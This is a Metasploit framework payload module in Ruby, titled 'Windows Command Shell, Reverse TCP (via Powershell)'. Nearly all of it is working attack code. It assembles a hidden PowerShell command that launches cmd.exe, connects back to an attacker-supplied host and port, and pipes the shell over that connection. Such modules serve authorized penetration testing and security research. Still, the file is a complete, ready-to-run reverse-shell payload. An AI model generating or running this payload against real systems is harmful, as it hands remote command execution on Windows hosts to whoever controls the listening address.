Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 1588
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(merge_info(info,
16
     'Name'          => 'Windows Command Shell, Reverse TCP (via Powershell)',
17
     'Description'   => 'Connect back and create a command shell via Powershell',
18
     'Author'        =>
19
       [
20
         'Dave Kennedy', # Original payload from trustedsec on SET
21
         'Ben Campbell' # Metasploit module
22
       ],
23
     'References'    =>
24
       [
25
         ['URL', 'https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell']
26
       ],
27
     # The powershell code is from SET, copyrighted by TrustedSEC, LLC and BSD licensed -- see https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE
28
     'License'       => MSF_LICENSE,
29
     'Platform'      => 'win',
30
     'Arch'          => ARCH_CMD,
31
     'Handler'       => Msf::Handler::ReverseTcp,
32
     'Session'       => Msf::Sessions::CommandShell,
33
     'PayloadType'   => 'cmd',
34
     'RequiredCmd'   => 'powershell',
35
     'Payload'       =>
36
       {
37
         'Offsets' => { },
38
         'Payload' => ''
39
       }
40
    ))
41
    register_advanced_options(
42
      [
43
        OptString.new('PowerShellPath', [true, 'The path to the PowerShell executable', 'powershell'])
44
      ]
45
    )
46
  end
47

48
  #
49
  # Constructs the payload
50
  #
51
  def generate(_opts = {})
52
    return super + command_string
53
  end
54

55
  #
56
  # Returns the command string to use for execution
57
  #
58
  def command_string
59
    lhost = datastore['LHOST']
60
    lport = datastore['LPORT']
61
    powershell = %Q^
62
$a='#{lhost}';
63
$b=#{lport};
64
$c=New-Object system.net.sockets.tcpclient;
65
$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
66
$ob=New-Object System.Byte[] 65536;
67
$eb=New-Object System.Byte[] 65536;
68
$e=new-object System.Text.UTF8Encoding;
69
$p=New-Object System.Diagnostics.Process;
70
$p.StartInfo.FileName='cmd.exe';
71
$p.StartInfo.RedirectStandardInput=1;
72
$p.StartInfo.RedirectStandardOutput=1;
73
$p.StartInfo.RedirectStandardError=1;
74
$p.StartInfo.UseShellExecute=0;
75
$q=$p.Start();
76
$is=$p.StandardInput;
77
$os=$p.StandardOutput;
78
$es=$p.StandardError;
79
$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
80
$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
81
$c.connect($a,$b);
82
$s=$c.GetStream();
83
while ($true) {
84
    start-sleep -m 100;
85
    if ($osread.IsCompleted -and $osread.Result -ne 0) {
86
      $r=$os.BaseStream.EndRead($osread);
87
      $s.Write($ob,0,$r);
88
      $s.Flush();
89
      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);
90
    }
91
    if ($esread.IsCompleted -and $esread.Result -ne 0) {
92
      $r=$es.BaseStream.EndRead($esread);
93
      $s.Write($eb,0,$r);
94
      $s.Flush();
95
      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);
96
    }
97
    if ($s.DataAvailable) {
98
      $r=$s.Read($nb,0,$nb.Length);
99
      if ($r -lt 1) {
100
          break;
101
      } else {
102
          $str=$e.GetString($nb,0,$r);
103
          $is.write($str);
104
      }
105
    }
106
    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
107
        break;
108
    }
109
    if ($p.ExitCode -ne $null) {
110
        break;
111
    }
112
}
113
^.gsub!("\n", "")
114

115
    "#{datastore['PowerShellPath']} -w hidden -nop -c #{powershell}"
116
  end
117
end
118

119